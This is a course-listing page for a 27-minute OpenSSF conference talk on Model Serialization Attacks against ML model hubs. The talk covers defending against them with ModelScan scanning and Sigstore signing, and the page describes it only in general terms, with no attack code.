Class Central is learner-supported. When you buy through links on our site, we may earn an affiliate commission.

YouTube

Trojan Model Hubs: Hacking the ML Supply Chain and Defending Against Model Serialization Attacks

OpenSSF via YouTube

Overview

Watch a 27-minute conference talk exploring the security risks and defensive strategies in machine learning supply chains. Learn about the growing reliance on public model hubs for foundation models and the vulnerability of ML model files to Model Serialization Attacks (MSA). Discover how these attacks can transform innocent models into system backdoors through malicious code injection during deserialization. Explore two key defensive strategies using open-source tools: model scanning with ModelScan by Protect AI and cryptographic signing with Sigstore by OpenSSF. Understand how model scanning provides visibility into black box model files, while cryptographic signatures establish trusted links between artifacts and their sources. See demonstrations of how these traditional software security approaches can be adapted to protect AI/ML systems from supply chain attacks and prevent Trojan horse infiltrations.

Syllabus

Trojan Model Hubs: Hacking the ML Supply Chain & Defending Yourself... Sam Washko & William Armiros

Taught by

OpenSSF

Reviews

Start your review of Trojan Model Hubs: Hacking the ML Supply Chain and Defending Against Model Serialization Attacks

Never Stop Learning.

Get personalized course recommendations, track subjects and courses with reminders, and more.

Someone learning on their laptop while sitting on the floor.